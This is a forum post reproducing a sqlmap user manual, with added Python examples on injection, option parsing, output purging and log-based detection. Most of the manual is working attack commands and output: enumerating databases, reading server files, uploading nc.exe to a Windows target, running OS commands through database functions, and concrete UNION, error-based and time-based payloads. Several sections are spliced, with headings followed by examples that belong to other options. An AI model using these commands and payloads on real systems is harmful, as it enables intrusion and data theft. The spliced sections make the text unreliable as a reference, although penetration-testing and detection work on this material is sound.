Title: sqlmap Chinese manual
Author: admin    Posted: 2017-9-8 09:05

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1

Given a URL like the one above, sqlmap will:
1. Determine which parameters are injectable
2. Determine which SQL injection technique can be used to inject
3. Identify the back-end database
4. Read the data the user asked for, according to the options chosen
sqlmap supports five different injection techniques:
1. Boolean-based blind injection: whether an injected condition is true or false can be judged from the page that comes back.
2. Time-based blind injection: nothing can be judged from the page content, so a conditional statement wrapping a time-delay is used, and whether the delay executed (i.e. whether the response time increased) tells you the result.
3. Error-based injection: the page returns an error message, or returns the result of the injected statement directly in the page.
4. UNION query injection: injection where a UNION can be used.
5. Stacked query injection: injection where several statements can be executed in one go.
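To make the first and third techniques concrete, here is an added example (written for this edition, not code from the sqlmap project or the original manual) that puts an unsafe query beside its parameterized form and checks, against a constructed in-memory SQLite table, whether the boolean oracle and the error leak those techniques rely on actually exist. The table, its rows and the `lookup_*` / `boolean_oracle_present` / `error_leaks` names are assumptions; SQLite stands in for whatever database backs `get_int.php`.

```python
import sqlite3

# Constructed sample data standing in for the table behind get_int.php?id=1
# (assumption: an integer id column; the real application's schema is unknown).
ROWS = [(1, "alice"), (2, "bob"), (3, "carol")]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, user_input):
    """Request parameter pasted into the SQL text: whatever the client sends
    becomes part of the statement. This is the defect sqlmap looks for."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_input):
    """The fix: the value is bound as a parameter, so it is compared with the
    column and never parsed as SQL. A non-numeric id simply matches nothing."""
    sql = "SELECT name FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def boolean_oracle_present(lookup):
    """Technique 1 needs exactly one thing: the response must differ depending
    on whether an injected condition is true or false. Returns True when that
    oracle exists for the given lookup function."""
    conn = make_db()
    true_case = lookup(conn, "1 AND 1=1")
    false_case = lookup(conn, "1 AND 1=2")
    return true_case != false_case


def error_leaks(lookup):
    """Technique 3 starts from a database error reaching the client. Returns
    True when a malformed value makes the query itself fail."""
    conn = make_db()
    try:
        lookup(conn, "1'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    for label, fn in (("vulnerable", lookup_vulnerable),
                      ("parameterized", lookup_parameterized)):
        print("%-13s boolean oracle: %-5s error leak: %s"
              % (label, boolean_oracle_present(fn), error_leaks(fn)))
```

The parameterized version returns the same (empty) result for the true and false conditions and raises nothing for the malformed value, which is precisely why neither the boolean-blind nor the error-based technique has anything to work with against it.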
Databases supported by sqlmap:
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB

The target can be given as a plain URL, a Burp or WebScarab request log file, a complete HTTP request in a text file, or a Google search whose matching result pages are used; you can also define your own regular expression to decide which addresses get tested.

It tests GET parameters, POST parameters, HTTP Cookie parameters, the HTTP User-Agent header and the HTTP Referer header for SQL injection, and you can also pass a comma-separated list of specific parameters to test.

The number of concurrent HTTP(S) requests can be set to make blind injection faster.

Videos of sqlmap in use on YouTube:
http://www.youtube.com/user/inquisb/videos
http://www.youtube.com/user/stamparm/videos

Articles with worked examples of sqlmap:
http://unconciousmind.blogspot.com/search/label/sqlmap

The latest version of sqlmap can be downloaded from https://github.com/sqlmapproject/sqlmap/tarball/master.

sqlmap can also be fetched with git:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
A MySQL 4.1 example:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --common-tables -D testdb --banner
[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner: '4.1.21-community-nt'
[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/txt/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+
Brute-forcing column names

Option: --common-columns
As with brute-forcing table names, the column names tried come from txt/common-columns.txt.

User-defined function injection

Options: --udf-inject, --shared-lib
You can inject your own user-defined functions (UDFs) by compiling a shared library for MySQL or PostgreSQL (a DLL on Windows, a shared object on Linux/Unix). sqlmap will ask you some questions, upload the UDFs to the database server, execute them according to your choices, and remove them from the database once you are done.
File system operations

Reading a file from the database server

Option: --file-read
Works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions. The file read can be text or binary.
A Microsoft SQL Server 2005 example:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Uploading a file to the database server

Options: --file-write, --file-dest
Works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions. The uploaded file can be text or binary.

A MySQL example:
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,
same size as the local file '/software/nc.exe.packed'

Running arbitrary operating system commands
Options: --os-cmd, --os-shell
Works when the database is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the privileges needed to use the relevant functions.

On MySQL and PostgreSQL, sqlmap uploads a binary library containing the user-defined functions sys_exec() and sys_eval(); the two functions it creates can then execute system commands. On Microsoft SQL Server, sqlmap uses the xp_cmdshell stored procedure: if it is disabled (the default on Microsoft SQL Server 2005 and later) sqlmap re-enables it, and if it does not exist sqlmap creates it.
A PostgreSQL example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \
--os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can
only be deleted manually
The --os-shell option also simulates a real shell, in which you can type the commands you want to run.

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
Other options

Option abbreviations

Option: -z
When the options you use are long and complicated, you can use the abbreviated form. For example:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"

can be written as:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"

And:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"

can be written as:
$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
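The -z abbreviations above and the --answers run just shown both depend on sqlmap matching a short string against something longer: a mnemonic against option names, and an answer key against the text of a prompt. The following added example (not code from sqlmap or from the manual) implements both lookups over a constructed subset of option names. The prefix rule for mnemonics and the substring rule for answers are assumptions chosen to reproduce the behaviour shown on this page, not a copy of sqlmap's own resolver, and the function names are mine.

```python
# Constructed subset of sqlmap's long option names, enough to resolve the
# mnemonics used on this page; the real parser knows many more.
LONG_OPTIONS = [
    "--batch", "--random-agent", "--ignore-proxy", "--technique",
    "--flush-session", "--dump", "--answers", "--threads", "--tamper",
]


def expand_mnemonic(mnemonic, options=LONG_OPTIONS):
    """Resolve one -z item such as 'randoma' or 'tec=BEU' to (option, value).

    Assumed rule (a simplification of sqlmap's resolver): the mnemonic,
    lower-cased and with dashes removed, must be a prefix of the option name
    with its dashes removed; a unique match wins and, if several options
    match, the shortest option name is chosen. No match raises ValueError.
    """
    name, _, value = mnemonic.partition("=")
    name = name.strip().replace("-", "").lower()
    if not name:
        raise ValueError("empty mnemonic in -z string")
    matches = [o for o in options
               if o.lstrip("-").replace("-", "").startswith(name)]
    if not matches:
        raise ValueError("no option matches mnemonic %r" % name)
    matches.sort(key=len)
    return matches[0], (value.strip() if value else True)


def expand_mnemonics(spec, options=LONG_OPTIONS):
    """Expand a whole -z string, e.g. 'bat,randoma,ign,tec=BEU', to a dict."""
    return dict(expand_mnemonic(item, options)
                for item in spec.split(",") if item.strip())


def to_long_form(spec, options=LONG_OPTIONS):
    """Render the expanded -z string as the equivalent long command-line options."""
    parts = []
    for option, value in expand_mnemonics(spec, options).items():
        parts.append(option if value is True else "%s=%s" % (option, value))
    return " ".join(parts)


def answer_for(prompt, answers):
    """Resolve --answers="question=answer[,question=answer...]" for one prompt.

    Assumed rule (consistent with the --answers run shown above): the
    'question' part is matched as a case-insensitive substring of the prompt
    text and the first matching entry wins. Returns None when no entry
    applies, meaning the prompt would still be shown to the user.
    """
    for item in answers.split(","):
        question, sep, answer = item.partition("=")
        question = question.strip()
        if sep and question and question.lower() in prompt.lower():
            return answer.strip()
    return None


if __name__ == "__main__":
    print(to_long_form("bat,randoma,ign,tec=BEU"))
    prompt = ("do you want to include all tests for 'MySQL' extending provided "
              "level (1) and risk (1)? [Y/n]")
    print(answer_for(prompt, "extending=N"))
```

Because the -z lookup is prefix-based, a mnemonic that is too short may silently resolve to an option you did not intend (here "t" would land on --tamper rather than --technique), which is a good reason to check the expanded form before running a long job with --batch.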
Beep when an SQL injection is found

For example:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
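The DEBUG lines above spell out the order in which --purge-output destroys the output directory. As an added example (not sqlmap's code), here is a small Python routine that carries out the same six steps on a constructed stand-in for the output/<host>/ layout; the file names, sizes and helper names are assumptions.

```python
import os
import secrets
import shutil
import stat
import tempfile


def _wipe_file(path, chunk=65536):
    """Apply the per-file steps in the order the DEBUG lines above list them."""
    # changing file attributes: make sure the file is writable by us
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    size = os.path.getsize(path)
    with open(path, "r+b") as fh:
        # writing random data to files: overwrite the full original length
        remaining = size
        while remaining > 0:
            n = min(chunk, remaining)
            fh.write(secrets.token_bytes(n))
            remaining -= n
        fh.flush()
        os.fsync(fh.fileno())
        # truncating files: the old length is metadata worth removing too
        fh.truncate(0)
    # renaming filenames to random values: so is the original file name
    new_path = os.path.join(os.path.dirname(path), secrets.token_hex(8))
    os.rename(path, new_path)
    return new_path


def purge_output(root):
    """Purge a sqlmap-style output directory; returns the number of files wiped.

    Symbolic links are unlinked rather than followed, so a link planted
    inside the tree cannot make the purge overwrite files elsewhere.
    """
    if not os.path.isdir(root) or os.path.islink(root):
        return 0
    wiped = 0
    # bottom-up walk: children are fully processed before their parent is renamed
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)
                continue
            _wipe_file(path)
            wiped += 1
        # renaming directory names to random values
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                os.unlink(path)
                continue
            os.chmod(path, stat.S_IRWXU)
            os.rename(path, os.path.join(dirpath, secrets.token_hex(8)))
    # deleting the whole directory tree
    shutil.rmtree(root)
    return wiped


def make_sample_tree():
    """Constructed stand-in for sqlmap's output/<host>/ layout, in a temp dir."""
    root = tempfile.mkdtemp(prefix="purge-demo-")
    host = os.path.join(root, "192.168.136.129")
    os.makedirs(os.path.join(host, "files"))
    os.makedirs(os.path.join(host, "dump", "testdb"))
    with open(os.path.join(host, "log"), "wb") as fh:
        fh.write(b"[hh:mm:40] [INFO] fetching banner\n")
    with open(os.path.join(host, "files", "C__example.exe"), "wb") as fh:
        fh.write(b"MZ" + b"\x00" * 2558)
    with open(os.path.join(host, "dump", "testdb", "users.csv"), "wb") as fh:
        fh.write(b"id,name\n1,alice\n")
    return root


def still_present(path):
    """True if anything (file, directory or dangling link) remains at path."""
    return os.path.lexists(path)


if __name__ == "__main__":
    root = make_sample_tree()
    print("wiped %d files; directory still present: %s"
          % (purge_output(root), still_present(root)))
```

The overwrite is only as strong as the storage underneath it: copy-on-write and flash file systems may keep the old blocks, so treat this as hygiene for the engagement data rather than a guarantee of destruction.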
Heuristic detection

Option: --smart
When you have a large number of target URLs to test, this option saves time by only injecting into parameters whose error responses let sqlmap quickly judge them injectable.
Example:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
Beginner wizard

Option: --wizard
An option aimed at novice users; it walks you step by step through the input needed to inject a target.
$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user: 'sa'
current database: 'testdb'
current user is DBA: True
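The injection-point summary above lists the exact payload shapes a successful run leaves in the web server's access log, which makes it a natural input for a detection rule. The following added example (not code from sqlmap or from the manual) applies a handful of regular expressions derived from those payloads to constructed combined-format log lines; the log lines, client addresses and signature names are assumptions, and the User-Agent check is deliberately a secondary signal because --random-agent replaces that header.

```python
import re
from urllib.parse import unquote_plus

# Regexes derived from the payload shapes in the wizard summary above. They are
# applied to the URL-decoded request path, so percent-encoding alone does not hide them.
SIGNATURES = [
    ("boolean-blind", re.compile(r"\bAND\s+(\d+)=\1\b", re.I)),
    ("time-based",    re.compile(r"\bWAITFOR\s+DELAY\s+'", re.I)),
    ("union-null",    re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I)),
    ("char-concat",   re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I)),
    ("error-convert", re.compile(r"\bCONVERT\(INT,", re.I)),
    ("stacked",       re.compile(r";\s*(?:WAITFOR|SELECT|EXEC)\b", re.I)),
]

# Combined (NCSA) access-log line: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample log: one benign request and three shaped like the payloads
# listed above (the '+' of the CHAR() concatenation travels as %2B on the wire).
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Sep/2017:09:05:01 +0800] "GET /sqlmap/mssql/iis/get_int.asp?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Sep/2017:09:05:02 +0800] "GET /sqlmap/mssql/iis/get_int.asp?id=1%20AND%202986%3D2986 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev-2defc30 (http://sqlmap.org)"',
    '10.0.0.9 - - [08/Sep/2017:09:05:03 +0800] "GET /sqlmap/mssql/iis/get_int.asp?id=1;%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Sep/2017:09:05:09 +0800] "GET /sqlmap/mssql/iis/get_int.asp?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(58)%2BCHAR(118)%2BCHAR(114)%2BCHAR(58)-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
]


def classify_request(path, user_agent=""):
    """Return the signature names that fire for one request, in SIGNATURES order."""
    decoded = unquote_plus(path)
    tags = [name for name, rx in SIGNATURES if rx.search(decoded)]
    # The default User-Agent announces the tool, but --random-agent replaces it,
    # so this is a bonus signal and never the only one.
    if "sqlmap" in user_agent.lower():
        tags.append("sqlmap-ua")
    return tags


def scan_access_log(lines):
    """Run every signature over each parsable log line; returns the hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("path"), m.group("ua"))
        if tags:
            hits.append({"ip": m.group("ip"), "path": m.group("path"),
                         "status": int(m.group("status")), "tags": tags})
    return hits


def hits_per_source(hits):
    """Count flagged requests per client address, the usual pivot for triage."""
    counts = {}
    for hit in hits:
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for hit in found:
        print(hit["ip"], hit["status"], ",".join(hit["tags"]), hit["path"])
    print(hits_per_source(found))
```

A 500 status on a request that also matches a signature (the UNION line above) is the error-based case from the summary showing up server-side; pairing these matches with the time-based pattern and a burst of requests from one address, as hits_per_source does, is what turns isolated log lines into an alert worth acting on.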